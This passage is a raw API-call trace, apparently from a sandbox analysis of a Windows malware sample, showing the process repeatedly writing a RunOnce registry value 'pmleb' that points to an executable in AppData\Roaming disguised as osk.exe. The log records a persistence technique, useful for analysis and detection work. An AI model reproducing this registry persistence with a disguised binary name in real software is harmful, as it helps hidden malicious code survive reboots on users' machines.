lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.817] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.817] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.817] RegCloseKey (hKey=0x280) returned 0x0 [0080.817] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.817] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.817] SetTimer (hWnd=0x20280, nIDEvent=0x208f, uElapse=0xa, lpTimerFunc=0x0) returned 0x208f [0080.818] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.829] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.829] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.829] KillTimer (hWnd=0x20280, uIDEvent=0x208f) returned 1 [0080.829] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.829] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.830] IUnknown:Release (This=0x787518) returned 0x1 [0080.830] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.830] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.830] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.830] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.830] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.830] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.830] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.830] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.830] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.830] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x14 [0080.830] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.830] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x15 [0080.831] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.831] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x14 [0080.831] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.832] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.832] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.832] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.832] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.832] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.832] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.832] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.832] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.832] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.832] RegCloseKey (hKey=0x280) returned 0x0 [0080.832] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.833] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.833] SetTimer (hWnd=0x20280, nIDEvent=0x2090, uElapse=0xa, lpTimerFunc=0x0) returned 0x2090 [0080.833] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.845] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.845] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.845] KillTimer (hWnd=0x20280, uIDEvent=0x2090) returned 1 [0080.845] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.845] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.845] IUnknown:Release (This=0x787518) returned 0x1 [0080.845] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.845] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.845] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.846] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.846] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.846] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.846] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.846] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.846] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.846] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x15 [0080.846] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.846] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x16 [0080.846] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.847] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x15 [0080.847] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.847] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.847] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.847] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.847] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.847] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.847] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.847] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.848] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.848] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.848] RegCloseKey (hKey=0x280) returned 0x0 [0080.848] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.848] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.848] SetTimer (hWnd=0x20280, nIDEvent=0x2091, uElapse=0xa, lpTimerFunc=0x0) returned 0x2091 [0080.848] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.860] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.860] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.861] KillTimer (hWnd=0x20280, uIDEvent=0x2091) returned 1 [0080.861] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.861] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.861] IUnknown:Release (This=0x787518) returned 0x1 [0080.861] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.861] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.861] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.861] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.861] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.861] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.862] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.862] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.862] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.862] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x16 [0080.862] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.862] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x17 [0080.862] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.863] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x16 [0080.863] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.863] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.863] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.863] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.863] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.863] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 